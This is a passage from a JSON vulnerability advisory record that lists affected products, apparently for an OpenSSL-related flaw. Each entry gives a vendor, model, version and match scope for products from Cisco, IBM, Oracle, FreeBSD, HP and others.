        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.0"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.1"
      },
      {
        "model": "cognos business intelligence fixpack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.12"
      },
      {
        "model": "telepresence sx series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "10.1-release-p25",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "security network controller 1.0.3394m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security network controller 1.0.3381m",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.2"
      },
      {
        "model": "enterprise content management system monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.5.1.5"
      },
      {
        "model": "registered envelope service",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5.1.0"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.1"
      },
      {
        "model": "mq appliance m2001",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "tivoli netcool system service monitors fp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.1"
      },
      {
        "model": "cognos business intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "99710"
      },
      {
        "model": "telepresence content server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.2"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(4)"
      },
      {
        "model": "meetingplace",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3104.4"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.4"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.32"
      },
      {
        "model": "security guardium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.0.2"
      },
      {
        "model": "anyconnect secure mobility client for linux",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "ata analog telephone adaptor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1870"
      },
      {
        "model": "asa cx and prime security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "universal small cell series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50003.5.12.21"
      },
      {
        "model": "project openssl 1.0.1m",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "expressway series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "anyconnect secure mobility client for android",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.2"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(1)"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50007.3.1"
      },
      {
        "model": "mediasense",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(3)"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.30"
      },
      {
        "model": "10.1-release-p6",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.0"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.0.2"
      },
      {
        "model": "edge digital media player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3000"
      },
      {
        "model": "unified ip phone 9.4.2sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8945"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.18-49"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(1.10000.12)"
      },
      {
        "model": "mq appliance m2000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "telepresence ex series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "nexus series switches",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1000v0"
      },
      {
        "model": "tivoli common reporting",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.1.3"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.34"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.6"
      },
      {
        "model": "mate design",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.0.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.32"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1.5"
      },
      {
        "model": "10.3-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.38"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.13-41"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "show and share",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.35"
      },
      {
        "model": "network admission control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "unified communications for microsoft lync",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.6"
      },
      {
        "model": "identity services engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.4"
      },
      {
        "model": "project openssl 1.0.1j",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.12"
      },
      {
        "model": "universal small cell series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70003.4.2.0"
      },
      {
        "model": "10.1-release-p33",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "nexus series switches 7.3.1dx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5000"
      },
      {
        "model": "telepresence conductor",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "abyp-0t-0s-4l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "unified attendant console standard",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.115"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4.0.0"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.1.1"
      },
      {
        "model": "jazz reporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0"
      },
      {
        "model": "connected grid routers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mate live",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.13"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.12"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.12"
      },
      {
        "model": "security appscan enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0.3"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.5(.1.6)"
      },
      {
        "model": "telepresence integrator c series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "project openssl 1.0.1d",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "unified workforce optimization sr3 es5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.2"
      },
      {
        "model": "unified communications manager 10.5 su3",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "jazz reporting service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.2"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "abyp-2t-2s-0l-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.7.3"
      },
      {
        "model": "abyp-4tl-p-m",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "nac server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "2.0(0.400)"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3381"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.9-34"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "12.3.2"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.3"
      },
      {
        "model": "abyp-4ts-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "digital media players series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "43000"
      },
      {
        "model": "workload deployer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.11"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": "9.3-release-p31",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3100"
      },
      {
        "model": "security proventia network active bypass 0343c3c",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.23"
      },
      {
        "model": "cloud manager with openstack interim fix1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3.0.6"
      },
      {
        "model": "unified ip phones 9.3 sr3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6901"
      },
      {
        "model": "digital media manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.3.6"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1.3"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0(0.98000.225)"
      },
      {
        "model": "prime network",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.3"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4.2.0"
      },
      {
        "model": "prime performance manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security access manager for web",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.02"
      },
      {
        "model": "prime collaboration provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "network analysis module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "digital media manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.0"
      },
      {
        "model": "websphere application server liberty profile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5.5"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.30"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.12"
      },
      {
        "model": "vm server for",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x863.4"
      },
      {
        "model": "unity connection",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "telepresence video communication server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.8"
      },
      {
        "model": "lancope stealthwatch flowcollector netflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "lancope stealthwatch smc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8.2"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(1.98991.13)"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.16"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "abyp-10g-2sr-2lr-1-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "prime optical for sps",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.6"
      },
      {
        "model": "telepresence mcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "45000"
      },
      {
        "model": "telepresence server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "87104.4"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1.0.0"
      },
      {
        "model": "telepresence isdn gw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "32410"
      },
      {
        "model": "nexus series switches",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50008.3"
      },
      {
        "model": "10.1-release-p31",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "tivoli netcool system service monitors interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.12-04"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.1"
      },
      {
        "model": "netflow generation appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1.2.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.1.18"
      },
      {
        "model": "telepresence server on multiparty media",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3104.1"
      },
      {
        "model": "telepresence ex series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "webex meetings server ssl gateway",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "-2.7"
      },
      {
        "model": "telepresence server on virtual machine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "system management homepage",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.6"
      },
      {
        "model": "cloud manager with openstack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.0.5"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.5"
      },
      {
        "model": "webex meetings for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "emergency responder",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5(1.10000.5)"
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.5"
      },
      {
        "model": "tivoli composite application manager for transactions if37",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.1"
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1.1"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.6"
      },
      {
        "model": "tivoli network manager ip edition fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.94"
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.0"
      },
      {
        "model": "prime license manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.5"
      },
      {
        "model": "security network controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.3376"
      },
      {
        "model": "netezza platform software 7.2.1.1-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1.3"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.18-42"
      },
      {
        "model": "messagesight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "unified communications manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "video surveillance series ip cameras",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70002.8"
      },
      {
        "model": "expressway series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.8"
      },
      {
        "model": "abyp-4t-0s-0l-p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0"
      },
      {
        "model": "email security appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.5"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.2"
      },
      {
        "model": "webex meetings server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "worklight enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1.0.2"
      },
      {
        "model": "virtual security gateway for microsoft hyper-v vsg2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.14"
      },
      {
        "model": "connected grid router cgos 15.6.2.15t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "wide area application services",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.2.3"
      },
      {
        "model": "9.3-release-p5",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "tivoli netcool system service monitors interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.12-01"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.0.4"
      },
      {
        "model": "unified intelligent contact management enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security identity manager virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.1"
      },
      {
        "model": "nexus series switches 7.3.1nx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6000"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.0.9"
      },
      {
        "model": "application and content networking system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "mmp server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.9.1"
      },
      {
        "model": "project openssl 1.0.1k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "9.3-release-p39",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "anyconnect secure mobility client for ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "rational application developer for websphere software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.1"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-114"
      },
      {
        "model": "telepresence mx series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "mysql server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.6.16"
      },
      {
        "model": "spa232d multi-line dect ata",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "1.4.5"
      },
      {
        "model": "linux -current",
        "scope": null,
        "trust": 0.3,
        "vendor": "slackware",
        "version": null
      },
      {
        "model": "tivoli provisioning manager for images build",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.20290.1"
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "telepresence profile series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1.2"
      },
      {
        "model": "datapower gateways",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0.0.13"
      },
      {
        "model": "anyconnect secure mobility client for os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "x4.2"
      },
      {
        "model": "tivoli netcool system service monitors interim fix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.014-08"
      },
      {
        "model": "lancope stealthwatch udp director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "6.8"
      },
      {
        "model": "universal small cell series",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70003.5.12.21"
      },
      {
        "model": "telepresence conductor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "application policy infrastructure controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "jabber for mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "globalprotect agent",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.1"
      },
      {
        "model": "dcm series 9900-digital content manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "19.0"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.3.2.0"
      },
      {
        "model": "10.3-release-p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "security access manager for mobile",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.1"
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.0.0"
      },
      {
        "model": "video surveillance 4300e/4500e high-definition ip cameras",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "security proventia network active bypass",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.1876"
      },
      {
        "model": "mediasense",
